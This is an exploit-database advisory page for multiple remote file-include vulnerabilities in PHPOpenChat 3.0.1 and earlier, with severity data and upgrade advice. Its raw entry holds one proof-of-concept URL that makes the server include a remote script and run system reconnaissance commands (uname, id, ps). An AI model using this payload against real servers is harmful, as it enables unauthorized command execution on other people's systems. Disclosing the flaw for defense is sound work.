header-logo
Suggest Exploit
vendor:
PHPOpenChat
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File-Include
98
CWE
Product Name: PHPOpenChat
Affected Version From: 3.0.1 and prior versions
Affected Version To: 3.0.1 and prior versions
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpopenchat:phpopenchat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PHPOpenChat Multiple Remote File-Include Vulnerabilities

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

Mitigation:

Upgrade to the latest version of PHPOpenChat
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12817/info
  
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
  
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
  
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue. 

http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

Navigation

Suggest Exploit

Services By CQR